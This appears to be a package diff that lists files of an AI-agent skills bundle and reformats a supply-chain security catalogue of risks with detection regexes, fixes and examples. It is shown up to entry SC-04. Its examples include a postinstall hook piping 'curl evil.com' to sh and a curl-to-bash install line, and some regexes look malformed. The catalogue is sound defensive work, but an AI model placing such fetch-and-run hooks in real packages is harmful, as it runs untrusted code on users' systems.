  408. package/.agent/skills/cross-cutting/testing/SKILL.md +13 -26
  409. package/.agent/skills/cross-cutting/testing/data/e2e-patterns.yaml +136 -0
  410. package/.agent/skills/cross-cutting/testing/data/frameworks.yaml +3 -3
  411. package/.agent/skills/cross-cutting/testing/data/patterns.yaml +149 -147
  412. package/.agent/skills/cross-cutting/wasm/META.yaml +47 -0
  413. package/.agent/skills/cross-cutting/wasm/SKILL.md +88 -0
  414. package/.agent/skills/cross-cutting/wasm/data/browser-patterns.yaml +106 -0
  415. package/.agent/skills/cross-cutting/wasm/data/component-model.yaml +85 -0
  416. package/.agent/skills/cross-cutting/wasm/data/server-patterns.yaml +89 -0
  417. package/.agent/skills/cross-cutting/web-perf/META.yaml +3 -9
  418. package/.agent/skills/cross-cutting/web-perf/SKILL.md +9 -18
  419. package/.agent/skills/devops/aws/META.yaml +48 -63
  420. package/.agent/skills/devops/azure/META.yaml +44 -0
  421. package/.agent/skills/devops/azure/SKILL.md +43 -0
  422. package/.agent/skills/devops/azure/data/cli.yaml +69 -0
  423. package/.agent/skills/devops/azure/data/compute.yaml +83 -0
  424. package/.agent/skills/devops/azure/data/data-services.yaml +126 -0
  425. package/.agent/skills/devops/ci-cd/META.yaml +47 -14
  426. package/.agent/skills/devops/docker/META.yaml +53 -14
  427. package/.agent/skills/devops/gcp/META.yaml +43 -0
  428. package/.agent/skills/devops/gcp/SKILL.md +43 -0
  429. package/.agent/skills/devops/gcp/data/cli.yaml +39 -0
  430. package/.agent/skills/devops/gcp/data/compute.yaml +92 -0
  431. package/.agent/skills/devops/gcp/data/data-services.yaml +97 -0
  432. package/.agent/skills/devops/kubernetes/META.yaml +56 -7
  433. package/.agent/skills/devops/terraform/META.yaml +47 -0
  434. package/.agent/skills/devops/terraform/SKILL.md +73 -0
  435. package/.agent/skills/devops/terraform/data/ci-cd.yaml +89 -0
  436. package/.agent/skills/devops/terraform/data/hcl-patterns.yaml +131 -0
  437. package/.agent/skills/devops/terraform/data/providers.yaml +96 -0
  438. package/.agent/skills/frameworks/angular/META.yaml +20 -6
  439. package/.agent/skills/frameworks/angular/SKILL.md +1 -1
  440. package/.agent/skills/frameworks/flutter/META.yaml +20 -6
  441. package/.agent/skills/frameworks/flutter/SKILL.md +1 -1
  442. package/.agent/skills/frameworks/nextjs/ADVANCED.md +2 -2
  443. package/.agent/skills/frameworks/nextjs/META.yaml +22 -8
  444. package/.agent/skills/frameworks/nextjs/SKILL.md +4 -4
  445. package/.agent/skills/frameworks/nextjs/data/server.yaml +4 -4
  446. package/.agent/skills/frameworks/nuxt/META.yaml +21 -7
  447. package/.agent/skills/frameworks/nuxt/SKILL.md +2 -2
  448. package/.agent/skills/frameworks/nuxt/data/core.yaml +14 -2
  449. package/.agent/skills/frameworks/nuxt/data/server.yaml +14 -2
  450. package/.agent/skills/frameworks/react/META.yaml +20 -7
  451. package/.agent/skills/frameworks/react/SKILL.md +7 -11
  452. package/.agent/skills/frameworks/react/data/core.yaml +14 -2
  453. package/.agent/skills/frameworks/react/data/server.yaml +16 -4
  454. package/.agent/skills/frameworks/react-native/META.yaml +19 -6
  455. package/.agent/skills/frameworks/react-native/SKILL.md +1 -1
  456. package/.agent/skills/frameworks/svelte/META.yaml +19 -6
  457. package/.agent/skills/frameworks/svelte/SKILL.md +1 -1
  458. package/.agent/skills/frameworks/vue/META.yaml +20 -8
  459. package/.agent/skills/frameworks/vue/SKILL.md +7 -7
  460. package/.agent/skills/frameworks/vue/data/advanced.yaml +19 -7
  461. package/.agent/skills/frameworks/vue/data/core.yaml +13 -1
  462. package/.agent/skills/index.json +67 -14
  463. package/.agent/skills/languages/asm/META.yaml +2 -8
  464. package/.agent/skills/languages/asm/SKILL.md +1 -1
  465. package/.agent/skills/languages/c/META.yaml +2 -8
  466. package/.agent/skills/languages/c/SKILL.md +1 -1
  467. package/.agent/skills/languages/clojure/META.yaml +2 -2
  468. package/.agent/skills/languages/clojure/SKILL.md +1 -1
  469. package/.agent/skills/languages/cpp/META.yaml +2 -8
  470. package/.agent/skills/languages/cpp/SKILL.md +1 -1
  471. package/.agent/skills/languages/crystal/META.yaml +2 -8
  472. package/.agent/skills/languages/crystal/SKILL.md +1 -1
  473. package/.agent/skills/languages/csharp/META.yaml +2 -2
  474. package/.agent/skills/languages/csharp/SKILL.md +1 -1
  475. package/.agent/skills/languages/elixir/META.yaml +2 -2
  476. package/.agent/skills/languages/elixir/SKILL.md +1 -1
  477. package/.agent/skills/languages/fsharp/META.yaml +2 -2
  478. package/.agent/skills/languages/fsharp/SKILL.md +1 -1
  479. package/.agent/skills/languages/go/META.yaml +2 -8
  480. package/.agent/skills/languages/go/SKILL.md +1 -1
  481. package/.agent/skills/languages/haskell/META.yaml +2 -2
  482. package/.agent/skills/languages/haskell/SKILL.md +1 -1
  483. package/.agent/skills/languages/java/META.yaml +2 -8
  484. package/.agent/skills/languages/java/SKILL.md +1 -1
  485. package/.agent/skills/languages/javascript/META.yaml +2 -8
  486. package/.agent/skills/languages/javascript/SKILL.md +1 -1
  487. package/.agent/skills/languages/julia/META.yaml +2 -2
  488. package/.agent/skills/languages/julia/SKILL.md +1 -1
  489. package/.agent/skills/languages/kotlin/META.yaml +2 -2
  490. package/.agent/skills/languages/kotlin/SKILL.md +1 -1
  491. package/.agent/skills/languages/lua/META.yaml +2 -8
  492. package/.agent/skills/languages/lua/SKILL.md +3 -3
  493. package/.agent/skills/languages/nim/META.yaml +2 -8
  494. package/.agent/skills/languages/nim/SKILL.md +1 -1
  495. package/.agent/skills/languages/ocaml/META.yaml +2 -2
  496. package/.agent/skills/languages/ocaml/SKILL.md +1 -1
  497. package/.agent/skills/languages/perl/META.yaml +2 -2
  498. package/.agent/skills/languages/perl/SKILL.md +1 -1
  499. package/.agent/skills/languages/php/META.yaml +2 -2
  500. package/.agent/skills/languages/php/SKILL.md +1 -1
  501. package/.agent/skills/languages/python/META.yaml +2 -8
  502. package/.agent/skills/languages/python/SKILL.md +1 -1
  503. package/.agent/skills/languages/r/META.yaml +2 -2
  504. package/.agent/skills/languages/r/SKILL.md +1 -1
  505. package/.agent/skills/languages/ruby/META.yaml +2 -2
  506. package/.agent/skills/languages/ruby/SKILL.md +1 -1
  507. package/.agent/skills/languages/rust/META.yaml +2 -8
  508. package/.agent/skills/languages/rust/SKILL.md +1 -1
  509. package/.agent/skills/languages/scala/META.yaml +2 -2
  510. package/.agent/skills/languages/scala/SKILL.md +1 -1
  511. package/.agent/skills/languages/solidity/META.yaml +2 -2
  512. package/.agent/skills/languages/solidity/SKILL.md +1 -1
  513. package/.agent/skills/languages/swift/META.yaml +2 -2
  514. package/.agent/skills/languages/swift/SKILL.md +1 -1
  515. package/.agent/skills/languages/typescript/META.yaml +2 -8
  516. package/.agent/skills/languages/typescript/SKILL.md +1 -1
  517. package/.agent/skills/languages/zig/META.yaml +5 -7
  518. package/.agent/skills/languages/zig/SKILL.md +1 -1
  519. package/.agent/skills/tooling/api-protocols/META.yaml +102 -0
  520. package/.agent/skills/tooling/api-protocols/SKILL.md +145 -0
  521. package/.agent/skills/tooling/api-protocols/data/graphql-patterns.yaml +115 -0
  522. package/.agent/skills/tooling/api-protocols/data/grpc-patterns.yaml +101 -0
  523. package/.agent/skills/tooling/api-protocols/data/trpc-patterns.yaml +97 -0
  524. package/.agent/skills/tooling/browser-agent/ADVANCED.md +242 -0
  525. package/.agent/skills/tooling/browser-agent/META.yaml +78 -0
  526. package/.agent/skills/tooling/browser-agent/SKILL.md +164 -0
  527. package/.agent/skills/tooling/browser-agent/data/element-discovery.yaml +208 -0
  528. package/.agent/skills/tooling/browser-agent/data/recording-patterns.yaml +74 -0
  529. package/.agent/skills/tooling/browser-agent/data/reporting-patterns.yaml +97 -0
  530. package/.agent/skills/tooling/browser-agent/data/subagent-patterns.yaml +158 -0
  531. package/.agent/skills/tooling/browser-agent/data/verification-flow.yaml +209 -0
  532. package/.agent/skills/tooling/cli-dev/META.yaml +55 -0
  533. package/.agent/skills/tooling/cli-dev/SKILL.md +83 -0
  534. package/.agent/skills/tooling/cli-dev/data/frameworks.yaml +128 -0
  535. package/.agent/skills/tooling/cli-dev/data/output-formats.yaml +58 -0
  536. package/.agent/skills/tooling/cli-dev/data/ux-patterns.yaml +97 -0
  537. package/.agent/skills/tooling/ide-extension/META.yaml +72 -0
  538. package/.agent/skills/tooling/ide-extension/SKILL.md +108 -0
  539. package/.agent/skills/tooling/ide-extension/data/jetbrains-patterns.yaml +118 -0
  540. package/.agent/skills/tooling/ide-extension/data/lsp-patterns.yaml +126 -0
  541. package/.agent/skills/tooling/ide-extension/data/vscode-patterns.yaml +172 -0
  542. package/.agent/skills/tooling/mcp/META.yaml +80 -0
  543. package/.agent/skills/tooling/mcp/SKILL.md +114 -0
  544. package/.agent/skills/tooling/mcp/data/security.yaml +116 -0
  545. package/.agent/skills/tooling/mcp/data/tool-design.yaml +124 -0
  546. package/.agent/skills/tooling/mcp/data/transport-patterns.yaml +95 -0
  547. package/.agent/templates/README.md +2 -2
  548. package/.agent/templates/debug-report.md +1 -1
  549. package/.agent/templates/deploy-plan.md +1 -1
  550. package/.agent/templates/doc-template.md +1 -1
  551. package/.agent/templates/index.yaml +2 -2
  552. package/.agent/templates/migrate-plan.md +1 -1
  553. package/.agent/templates/phase-template.md +1 -1
  554. package/.agent/templates/tasks/audit.yaml +1 -1
  555. package/.agent/templates/tasks/bug_fix.yaml +1 -1
  556. package/.agent/templates/tasks/code_implementation.yaml +1 -1
  557. package/.agent/templates/tasks/refactor.yaml +1 -1
  558. package/.agent/templates/test-report.md +1 -1
  559. package/.agent/workflows/code.md +22 -1
  560. package/.agent/workflows/deploy.md +5 -1
  561. package/.agent/workflows/e2e.md +112 -0
  562. package/.agent/workflows/fix.md +1 -1
  563. package/.agent/workflows/prompt.md +325 -0
  564. package/.agent/workflows/scaffold.md +1 -1
  565. package/.agent/workflows/tdd.md +108 -0
  566. package/.agent/workflows/verify.md +116 -0
  567. package/.agent/workflows/visualize.md +50 -18
  568. package/dist/commands/add.d.ts.map +1 -1
  569. package/dist/commands/add.js +9 -1
  570. package/dist/commands/add.js.map +1 -1
  571. package/dist/commands/config.d.ts.map +1 -1
  572. package/dist/commands/config.js +24 -8
  573. package/dist/commands/config.js.map +1 -1
  574. package/dist/commands/hsa.d.ts.map +1 -1
  575. package/dist/commands/hsa.js +106 -20
  576. package/dist/commands/hsa.js.map +1 -1
  577. package/dist/commands/init.d.ts.map +1 -1
  578. package/dist/commands/init.js +65 -61
  579. package/dist/commands/init.js.map +1 -1
  580. package/dist/commands/install-core.d.ts +2 -1
  581. package/dist/commands/install-core.d.ts.map +1 -1
  582. package/dist/commands/install-core.js +43 -16
  583. package/dist/commands/install-core.js.map +1 -1
  584. package/dist/commands/install-helpers.d.ts.map +1 -1
  585. package/dist/commands/install-helpers.js +23 -2
  586. package/dist/commands/install-helpers.js.map +1 -1
  587. package/dist/commands/install-hsa.d.ts +2 -5
  588. package/dist/commands/install-hsa.d.ts.map +1 -1
  589. package/dist/commands/install-hsa.js +2 -5
  590. package/dist/commands/install-hsa.js.map +1 -1
  591. package/dist/commands/install.d.ts +27 -0
  592. package/dist/commands/install.d.ts.map +1 -1
  593. package/dist/commands/install.js +68 -20
  594. package/dist/commands/install.js.map +1 -1
  595. package/dist/commands/list.d.ts.map +1 -1
  596. package/dist/commands/list.js +2 -1
  597. package/dist/commands/list.js.map +1 -1
  598. package/dist/commands/mcp-registry.d.ts +24 -9
  599. package/dist/commands/mcp-registry.d.ts.map +1 -1
  600. package/dist/commands/mcp-registry.js +39 -57
  601. package/dist/commands/mcp-registry.js.map +1 -1
  602. package/dist/commands/mcp-writers.d.ts.map +1 -1
  603. package/dist/commands/mcp-writers.js +6 -5
  604. package/dist/commands/mcp-writers.js.map +1 -1
  605. package/dist/commands/mcp.d.ts +1 -1
  606. package/dist/commands/mcp.d.ts.map +1 -1
  607. package/dist/commands/mcp.js +37 -9
  608. package/dist/commands/mcp.js.map +1 -1
  609. package/dist/commands/update.d.ts.map +1 -1
  610. package/dist/commands/update.js +16 -6
  611. package/dist/commands/update.js.map +1 -1
  612. package/dist/constants/cursor-globs.d.ts.map +1 -1
  613. package/dist/constants/cursor-globs.js +0 -6
  614. package/dist/constants/cursor-globs.js.map +1 -1
  615. package/dist/constants/ide-install-specs.js +2 -2
  616. package/dist/constants.d.ts +3 -3
  617. package/dist/constants.d.ts.map +1 -1
  618. package/dist/constants.js +3 -3
  619. package/dist/constants.js.map +1 -1
  620. package/dist/index.d.ts.map +1 -1
  621. package/dist/index.js +1 -9
  622. package/dist/index.js.map +1 -1
  623. package/dist/types/ide-install.js +1 -1
  624. package/dist/utils/copy-helpers.d.ts +7 -2
  625. package/dist/utils/copy-helpers.d.ts.map +1 -1
  626. package/dist/utils/copy-helpers.js +56 -42
  627. package/dist/utils/copy-helpers.js.map +1 -1
  628. package/dist/utils/install-manifest.d.ts +12 -0
  629. package/dist/utils/install-manifest.d.ts.map +1 -0
  630. package/dist/utils/install-manifest.js +26 -0
  631. package/dist/utils/install-manifest.js.map +1 -0
  632. package/dist/utils/validation.d.ts.map +1 -1
  633. package/dist/utils/validation.js +31 -1
  634. package/dist/utils/validation.js.map +1 -1
  635. package/package.json +1 -1
  636. package/.agent/core/embeddings.json +0 -2004
  637. package/.agent/core/session_cache.json +0 -50
  638. package/.agent/skills/cross-cutting/aws/META.yaml +0 -75
  639. package/.agent/skills/cross-cutting/ci-cd/META.yaml +0 -60
  640. package/.agent/skills/cross-cutting/docker/META.yaml +0 -65
  641. package/.agent/skills/cross-cutting/kubernetes/META.yaml +0 -70
  642. package/.agent/skills/cross-cutting/ui-ux-pro-max/SKILL.md +0 -565
  643. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/charts.yaml +0 -331
  644. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/colors.yaml +0 -1226
  645. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/component-decision.yaml +0 -287
  646. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/component-mapping.yaml +0 -318
  647. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/design-tokens.yaml +0 -525
  648. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/desktop-animation.yaml +0 -232
  649. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/desktop-architecture.yaml +0 -140
  650. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/directory-structure.yaml +0 -75
  651. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/icons.yaml +0 -918
  652. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/implementation-strategy.yaml +0 -107
  653. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/landing.yaml +0 -372
  654. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/platform-frameworks.yaml +0 -195
  655. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/platform-guidelines.yaml +0 -177
  656. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/products.yaml +0 -1339
  657. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/prompts.yaml +0 -180
  658. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/react-performance.yaml +0 -504
  659. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/stacks/desktop.yaml +0 -228
  660. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/stacks/flutter.yaml +0 -508
  661. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/stacks/html-tailwind.yaml +0 -543
  662. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/stacks/nextjs.yaml +0 -515
  663. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/stacks/nuxt-ui.yaml +0 -519
  664. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/stacks/nuxtjs.yaml +0 -599
  665. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/stacks/react-native.yaml +0 -496
  666. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/stacks/react.yaml +0 -526
  667. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/stacks/shadcn.yaml +0 -616
  668. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/stacks/svelte.yaml +0 -520
  669. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/stacks/swiftui.yaml +0 -486
  670. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/stacks/vue.yaml +0 -485
  671. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/styles.yaml +0 -1473
  672. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/typography.yaml +0 -647
  673. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/ui-reasoning.yaml +0 -1019
  674. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/ux-guidelines.yaml +0 -1009
  675. package/.agent/skills/cross-cutting/ui-ux-pro-max/data/web-interface.yaml +0 -347
  676. package/.agent/skills/cross-cutting/ui-ux-pro-max/scripts/__pycache__/core.cpython-310.pyc +0 -0
  677. package/.agent/skills/cross-cutting/ui-ux-pro-max/scripts/__pycache__/core.cpython-314.pyc +0 -0
  678. package/.agent/skills/cross-cutting/ui-ux-pro-max/scripts/__pycache__/design_system.cpython-314.pyc +0 -0
  679. package/.agent/skills/cross-cutting/ui-ux-pro-max/scripts/core.py +0 -393
  680. package/.agent/skills/cross-cutting/ui-ux-pro-max/scripts/core_legacy.py +0 -303
  681. package/.agent/skills/cross-cutting/ui-ux-pro-max/scripts/design_system.py +0 -496
  682. package/.agent/skills/cross-cutting/ui-ux-pro-max/scripts/search.py +0 -76
  683. package/.agent/skills/devops/aws/ADVANCED.md +0 -547
  684. package/.agent/skills/devops/aws/SKILL.md +0 -711
  685. package/.agent/skills/devops/ci-cd/ADVANCED.md +0 -529
  686. package/.agent/skills/devops/ci-cd/SKILL.md +0 -821
  687. package/.agent/skills/devops/docker/ADVANCED.md +0 -495
  688. package/.agent/skills/devops/docker/SKILL.md +0 -653
  689. package/.agent/skills/devops/kubernetes/ADVANCED.md +0 -252
  690. package/.agent/skills/devops/kubernetes/SKILL.md +0 -621
  691. /package/.agent/core/{ARCH_REGISTRY.yaml → reference/ARCH_REGISTRY.yaml} +0 -0
  692. /package/.agent/core/{BRANDING.yaml → reference/BRANDING.yaml} +0 -0
  693. /package/.agent/core/{HSA.yaml → reference/HSA.yaml} +0 -0
  694. /package/.agent/core/{TEMPLATES.yaml → reference/TEMPLATES.yaml} +0 -0
  695. /package/.agent/rules/{incremental-changes.md → archive/incremental-changes.md} +0 -0
  696. /package/.agent/rules/{shell-commands.md → archive/shell-commands.md} +0 -0
  697. /package/.agent/skills/{cross-cutting → devops}/aws/data/ai_ml.yaml +0 -0
  698. /package/.agent/skills/{cross-cutting → devops}/aws/data/compute.yaml +0 -0
  699. /package/.agent/skills/{cross-cutting → devops}/aws/data/kubernetes.yaml +0 -0
  700. /package/.agent/skills/{cross-cutting → devops}/aws/data/storage.yaml +0 -0
  701. /package/.agent/skills/{cross-cutting → devops}/ci-cd/data/github_actions.yaml +0 -0
  702. /package/.agent/skills/{cross-cutting → devops}/ci-cd/data/security.yaml +0 -0
  703. /package/.agent/skills/{cross-cutting → devops}/docker/data/build.yaml +0 -0
  704. /package/.agent/skills/{cross-cutting → devops}/docker/data/compose.yaml +0 -0
  705. /package/.agent/skills/{cross-cutting → devops}/docker/data/security.yaml +0 -0
  706. /package/.agent/skills/{cross-cutting → devops}/kubernetes/data/networking.yaml +0 -0
  707. /package/.agent/skills/{cross-cutting → devops}/kubernetes/data/scheduling.yaml +0 -0
  708. /package/.agent/skills/{cross-cutting → devops}/kubernetes/data/security.yaml +0 -0
  709. /package/.agent/skills/{cross-cutting → devops}/kubernetes/data/workloads.yaml +0 -0
package/.agent/skills/core/security/data/supply-chain.yaml CHANGED
@@ -1,219 +1,219 @@
1
1
  metadata:
2
2
  skill: security
3
3
  domain: supply_chain
4
- version: 6.2.0
5
- updated: '2026-02-05'
6
- migrated_from: supply-chain.csv
4
+ version: 6.2.1
5
+ updated: "2026-02-05"
6
+ migrated_from: supply-chain.yaml
7
7
  patterns_count: 20
8
8
  columns:
9
- - id
10
- - name
11
- - severity
12
- - category
13
- - description
14
- - detection_pattern
15
- - fix_pattern
16
- - slsa_level
17
- - example_vuln
18
- - example_fix
9
+ - id
10
+ - name
11
+ - severity
12
+ - category
13
+ - description
14
+ - detection_pattern
15
+ - fix_pattern
16
+ - slsa_level
17
+ - example_vuln
18
+ - example_fix
19
19
  patterns:
20
- - id: SC-01
21
- name: Dependency Confusion
22
- severity: CRITICAL
23
- category: Package
24
- description: Private package names conflicting with public registries
25
- detection_pattern: (npm publish|pip install|go get)(?!.*private)
26
- fix_pattern: Use scoped names or private registry configuration
27
- slsa_level: '2'
28
- example_vuln: npm install @company/utils // Public npm checks first
29
- example_fix: registry=https://registry.company.com\n@company:registry=https://private.company.com
30
- - id: SC-02
31
- name: Typosquatting Package
32
- severity: CRITICAL
33
- category: Package
34
- description: Dependencies with similar names to popular packages
35
- detection_pattern: (loadsh|reqeusts|djagno|expresss|reactt)
36
- fix_pattern: Verify package names use lockfiles enable typosquatting checks
37
- slsa_level: '1'
38
- example_vuln: npm install lodahs // Typo of lodash
39
- example_fix: npm install lodash // Correct\n# Use npm-audit or Snyk
40
- - id: SC-03
41
- name: Unpinned Dependencies
42
- severity: HIGH
43
- category: Version
44
- description: Dependencies not pinned to specific versions
45
- detection_pattern: (dependencies.*:\\s*['\]\\^|~|latest['\"])"
46
- fix_pattern: Pin exact versions or use lockfiles verify checksums
47
- slsa_level: '2'
48
- example_vuln: '\lodash\": \"^4.0.0\" // Allows any 4.x"'
49
- example_fix: '\lodash\": \"4.17.21\" // Exact version"'
50
- - id: SC-04
51
- name: Missing Lockfile
52
- severity: HIGH
53
- category: Build
54
- description: No package lockfile to ensure reproducible builds
55
- detection_pattern: package\\.json(?!.*lock)
56
- fix_pattern: 'Always commit lockfile: package-lock.json yarn.lock'
57
- slsa_level: '2'
58
- example_vuln: // No lockfile committed
59
- example_fix: .gitignore should NOT contain:\n# package-lock.json
60
- - id: SC-05
61
- name: Unverified Downloads
62
- severity: HIGH
63
- category: Build
64
- description: Build scripts download dependencies without verification
65
- detection_pattern: (curl|wget|fetch).*\\|.*sh(?!.*verify|checksum)
66
- fix_pattern: Verify checksums signatures before executing
67
- slsa_level: '2'
68
- example_vuln: curl https://install.sh | bash
69
- example_fix: curl -O script.sh\nsha256sum -c script.sh.sha256\nbash script.sh
70
- - id: SC-06
71
- name: No SBOM Generation
72
- severity: MEDIUM
73
- category: Compliance
74
- description: Software Bill of Materials not generated - EU CRA 2024
75
- detection_pattern: (build|release)(?!.*sbom|cyclonedx|spdx)
76
- fix_pattern: Generate SBOM in CycloneDX or SPDX format
77
- slsa_level: '3'
78
- example_vuln: // No SBOM in build pipeline
79
- example_fix: npm run build\nnpx @cyclonedx/cyclonedx-npm --output sbom.json
80
- - id: SC-07
81
- name: SBOM Not Signed
82
- severity: MEDIUM
83
- category: Compliance
84
- description: SBOM exists but not cryptographically signed
85
- detection_pattern: (sbom|bom)(?!.*sign|gpg|sigstore)
86
- fix_pattern: Sign SBOM with Sigstore or GPG for integrity
87
- slsa_level: '3'
88
- example_vuln: // Unsigned SBOM generated
89
- example_fix: cosign sign-blob sbom.json --bundle sbom.bundle
90
- - id: SC-08
91
- name: No SLSA Build
92
- severity: HIGH
93
- category: Build
94
- description: Build process does not meet SLSA L1 requirements
95
- detection_pattern: (build|ci)(?!.*slsa|provenance)
96
- fix_pattern: Implement SLSA provenance generation in CI
97
- slsa_level: '2'
98
- example_vuln: // No build provenance
99
- example_fix: '# GitHub Actions with SLSA generator\nuses: slsa-framework/slsa-github-generator@v1'
100
- - id: SC-09
101
- name: Vulnerable Transitive Deps
102
- severity: HIGH
103
- category: Dependencies
104
- description: Transitive dependencies with known vulnerabilities
105
- detection_pattern: (node_modules|vendor).*CVE(?!.*patched)
106
- fix_pattern: Audit transitive deps use tools like Snyk or Trivy
107
- slsa_level: '2'
108
- example_vuln: // npm audit shows high vulns
109
- example_fix: npm audit fix --force\n# Or override in package.json
110
- - id: SC-10
111
- name: Compromised Maintainer
112
- severity: HIGH
113
- category: Trust
114
- description: Dependencies from accounts with weak security
115
- detection_pattern: (npm\\.pkg|pypi\\.org)(?!.*2fa|verified)
116
- fix_pattern: Prefer packages from verified organizations orgs
117
- slsa_level: '1'
118
- example_vuln: // Install from unverified author
119
- example_fix: // Use verified org packages\n// Check maintainer 2FA status
120
- - id: SC-11
121
- name: Build Script Injection
122
- severity: CRITICAL
123
- category: Build
124
- description: User input used in build scripts without sanitization
125
- detection_pattern: (npm run|make|script).*\\$\\{?\\w+
126
- fix_pattern: Sanitize all inputs used in build scripts
127
- slsa_level: '3'
128
- example_vuln: npm run build --version=${USER_INPUT}
129
- example_fix: const version = sanitize(process.env.VERSION)
130
- - id: SC-12
131
- name: Missing Code Review
132
- severity: HIGH
133
- category: Process
134
- description: Commits merged without required code review
135
- detection_pattern: (merge|push)(?!.*review|approve)
136
- fix_pattern: Require code review for all changes enable branch protection
137
- slsa_level: '3'
138
- example_vuln: // Direct push to main allowed
139
- example_fix: '# Branch protection:\nRequire pull request reviews: 2'
140
- - id: SC-13
141
- name: No Signed Commits
142
- severity: MEDIUM
143
- category: Process
144
- description: Commits not cryptographically signed
145
- detection_pattern: git commit(?!.*-S|gpg)
146
- fix_pattern: Require signed commits for all contributors
147
- slsa_level: '2'
148
- example_vuln: git commit -m 'feature'
149
- example_fix: 'git commit -S -m ''feature''\n# Configure: git config commit.gpgsign true'
150
- - id: SC-14
151
- name: Insecure CI Secrets
152
- severity: CRITICAL
153
- category: CI/CD
154
- description: CI secrets exposed in logs or accessible to forks
155
- detection_pattern: (echo.*\\$SECRET|print.*API_KEY|secrets.*fork)
156
- fix_pattern: Use proper secret management mask from logs
157
- slsa_level: '3'
158
- example_vuln: 'echo $API_KEY # Leaked in logs'
159
- example_fix: '# Use GitHub secrets with mask\necho ''***'' instead of actual secret'
160
- - id: SC-15
161
- name: CI Supply Chain Attack
162
- severity: CRITICAL
163
- category: CI/CD
164
- description: CI actions or plugins from untrusted sources
165
- detection_pattern: uses:\\s*[^@]+@(?!v\\d|sha:|main)
166
- fix_pattern: Pin CI actions to specific commits or versions
167
- slsa_level: '3'
168
- example_vuln: 'uses: random-user/action@main'
169
- example_fix: 'uses: actions/checkout@v4.1.0\n# Or pin to SHA:\nuses: actions/checkout@abc1234'
170
- - id: SC-16
171
- name: No Reproducible Builds
172
- severity: MEDIUM
173
- category: Build
174
- description: Build output varies between identical inputs
175
- detection_pattern: (build|compile)(?!.*reproducible|deterministic)
176
- fix_pattern: Enable reproducible builds verify output hashes
177
- slsa_level: '3'
178
- example_vuln: // Non-deterministic builds
179
- example_fix: '# Enable reproducible builds\nSOURCE_DATE_EPOCH=0 npm run build'
180
- - id: SC-17
181
- name: Package Integrity Missing
182
- severity: HIGH
183
- category: Registry
184
- description: Package checksums not verified during install
185
- detection_pattern: (npm install|pip install|go get)(?!.*integrity|checksum)
186
- fix_pattern: Enable package integrity checking in package manager
187
- slsa_level: '2'
188
- example_vuln: npm install --ignore-scripts
189
- example_fix: npm install --integrity\n# package-lock.json contains integrity hashes
190
- - id: SC-18
191
- name: Dependency Update Lag
192
- severity: MEDIUM
193
- category: Maintenance
194
- description: Dependencies significantly behind latest versions
195
- detection_pattern: (outdated|deprecated).*\\d+\\sversions
196
- fix_pattern: Implement automated dependency updates with testing
197
- slsa_level: '1'
198
- example_vuln: // 50+ outdated packages
199
- example_fix: '# Dependabot or Renovate config\nupdateNotScheduled: weekly'
200
- - id: SC-19
201
- name: No Provenance Attestation
202
- severity: HIGH
203
- category: Trust
204
- description: Published packages lack SLSA provenance attestation
205
- detection_pattern: (npm publish|cargo publish)(?!.*provenance|attest)
206
- fix_pattern: Generate and publish provenance with releases
207
- slsa_level: '3'
208
- example_vuln: npm publish
209
- example_fix: npm publish --provenance\n# Requires npm 9.5+ and GitHub Actions
210
- - id: SC-20
211
- name: Malicious Script Hooks
212
- severity: CRITICAL
213
- category: Package
214
- description: Dangerous commands in package script hooks
215
- detection_pattern: (preinstall|postinstall).*\\b(rm|curl|wget|eval)\\b
216
- fix_pattern: Review all install scripts audit before installing
217
- slsa_level: '2'
218
- example_vuln: '\postinstall\": \"curl evil.com | sh\""'
219
- example_fix: // Only use trusted packages\n// Review postinstall scripts
20
+ - id: SC-01
21
+ name: Dependency Confusion
22
+ severity: CRITICAL
23
+ category: Package
24
+ description: Private package names conflicting with public registries
25
+ detection_pattern: (npm publish|pip install|go get)(?!.*private)
26
+ fix_pattern: Use scoped names or private registry configuration
27
+ slsa_level: "2"
28
+ example_vuln: npm install @company/utils // Public npm checks first
29
+ example_fix: registry=https://registry.company.com\n@company:registry=https://private.company.com
30
+ - id: SC-02
31
+ name: Typosquatting Package
32
+ severity: CRITICAL
33
+ category: Package
34
+ description: Dependencies with similar names to popular packages
35
+ detection_pattern: (loadsh|reqeusts|djagno|expresss|reactt)
36
+ fix_pattern: Verify package names use lockfiles enable typosquatting checks
37
+ slsa_level: "1"
38
+ example_vuln: npm install lodahs // Typo of lodash
39
+ example_fix: npm install lodash // Correct\n# Use npm-audit or Snyk
40
+ - id: SC-03
41
+ name: Unpinned Dependencies
42
+ severity: HIGH
43
+ category: Version
44
+ description: Dependencies not pinned to specific versions
45
+ detection_pattern: (dependencies.*:\\s*['\]\\^|~|latest['\"])"
46
+ fix_pattern: Pin exact versions or use lockfiles verify checksums
47
+ slsa_level: "2"
48
+ example_vuln: '\lodash\": \"^4.0.0\" // Allows any 4.x"'
49
+ example_fix: '\lodash\": \"4.17.21\" // Exact version"'
50
+ - id: SC-04
51
